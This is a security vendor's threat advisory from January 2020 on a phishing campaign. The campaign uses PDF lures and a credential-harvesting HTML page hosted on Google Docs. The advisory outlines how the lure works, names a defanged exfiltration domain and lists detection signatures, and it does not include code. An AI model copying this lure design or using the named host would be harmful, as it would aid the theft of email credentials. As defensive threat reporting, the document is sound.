PDF Phishing campaign uses Google Docs to steal victim's Email credentials

January 8, 2020

SonicWall Capture Labs Threats Research team has discovered an ongoing phishing campaign which abuses genuine web-based software office suite platform like google docs. Upon opening the PDF file, a blurred image with instructions on how to view the document is displayed to the user:


If the instructions as mentioned in the PDF file are followed, an HTML file is downloaded without user intervention from Google Docs URL as shown below:


When the downloaded HTML file is opened, the user is shown a genuine looking webpage with options to select email providers like Yahoo, Google, Outlook, Office etc to view the document:


Depending upon the email provider chosen by the user, one of the following form would be displayed:


Upon entering the user credentials and clicking the sign-in button the user is displayed a clean PDF file downloaded from remote server to appear legitimate:


However in the background the malware author steals user credentials when the sign-in button is clicked and sends them to remote web server “hxxps://webpersonaltrainer[.]top” as shown below:


These PDF files are not detected by any vendor when checked on top threat intelligence sharing portals like virus total:


SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Downloader.FR (Trojan)
  • GAV: Downloader.PD_18 (Trojan)